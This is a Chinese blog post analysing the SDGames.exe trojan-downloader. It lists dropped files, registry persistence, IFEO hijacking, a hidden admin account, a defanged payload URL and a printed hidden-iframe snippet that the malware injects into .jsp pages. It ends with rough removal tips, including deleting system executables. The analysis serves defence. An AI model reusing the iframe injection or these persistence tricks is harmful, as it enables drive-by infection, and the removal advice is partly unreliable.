当前位置: 电脑软硬件应用网 > 电脑学院 > 网络安全 > 正文 |
|
|||
小瓢虫(SDGames.exe)病毒分析手动解决思路 | |||
2007-12-25 12:08:01 文/孤独更可… 出处:孤独更可靠博客 | |||
文件名称:SDGames.exe 文件大小:59282 byte A V命名: Trojan.Win32.VB.yth(瑞星) Trojan-Downloader.Win32.VB.lg(卡巴斯基) Win32.Troj.Downloader.vb.237568(金山) 加壳方式:北斗4.1 编写语言:Microsoft Visual Basic 5.0 / 6.0 文件MD5:fc334ffcf5aff3ca8235705d61f62990 行为分析: 1、释放病毒副本: C:\WINDOWS\system32\AUTORUN.INF 149 字节 C:\WINDOWS\system32\Avpser.cmd 1446 字节 C:\WINDOWS\system32\netshare.cmd 416 字节 C:\WINDOWS\system32\SDGames.exe 59282 字节 C:\WINDOWS\system32\Taskeep.vbs 612 字节 A-Z盘下生成: AUTORUN.INF 149 字节, RHS 在生成AUTORUN.INF前,会先调用RD命令删除免疫的AUTORUN.INF(如果有) 2、添加启动项: (1)HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run (2)修改system.ini,加入Load和Run值: 路径为:C:\windows\system32\SDGames.exe 3、开启以下服务: winmgmt lanmanserver 禁用以下服务: Alg sharedaccess 4、禁用一些系统功能,比如显示隐藏文件、扩展名、任务管理器、CMD等。 5、修改Reg、Txt文件关联,为:C:\windows\system32\SDGames.exe。 6、IFEO重定向劫持,指向:C:\windows\system32\SDGames.exe。 都是一些比较有名气的安全工具,另外连QQ和影子进程都不放过。 7、Avpser.cmd则尝试关闭一些进程(列一部分): %p% RavMonD.exe 8、添加Guest账户,为空密码,权限为Administrator。 9、修改系统时间,为2030年。 10、通过直接获得系统内存隐藏进程,防止被结束。 11、释放Taskeep.vbs,这个应该互斥体,防止进程有多个病毒体在运行。 12、结束explorer.exe进程,并ping127.0.0.1,如果通畅,会下载一个文件,然后重新启动explorer: hxxp://**.icpcn.com/QQ.gif 其实是个PE文件,具体是什么病毒还没看,不过测试时没有实现。 13、查找: .jsp 并插入一段代码: <iframe id="iframe" width="0" height="0" scrolling="no" frameborder="0" src="hxxp://zh**.10mb.cn/" name="Myframe" align="center" border="0"> 一个伪装百度的网站,不过下面挂了一个东西: hxxp://xxx.bao01.com/0.js,失效了~~ 14、修改IE主页,为hxxp://**.10mb.cn/。 15、跳过C盘,然后覆盖EXE文件。。(不可能恢复),图标为瓢虫模样。 16、还有一些乱七八糟的,就不写了~ 另外这病毒传播方式不是很理想,所以不写解决方法了~ 很麻烦滴~ 思路是: 1、把SDGame.exe和一些重要的文件覆盖并阻止再生。可以用PowerRmv(可到down.45its.com下载)。 建议暂时删除系统文件taskkill.exe、net.exe、cmd.exe。等弄好后从Dllcache恢复。 不然你会发现计算机响应的速度让你无法忍受。>4核的忽略这步 2、修正系统时间,再下载SREng(可到down.45its.com下载)修改被禁用的XX... 3、那些EXE只能删除了。 |
|||
关于45IT | About 45IT | 联系方式 | 版权声明 | 网站导航 | |
Copyright © 2003-2011 45IT. All Rights Reserved 浙ICP备09049068号 |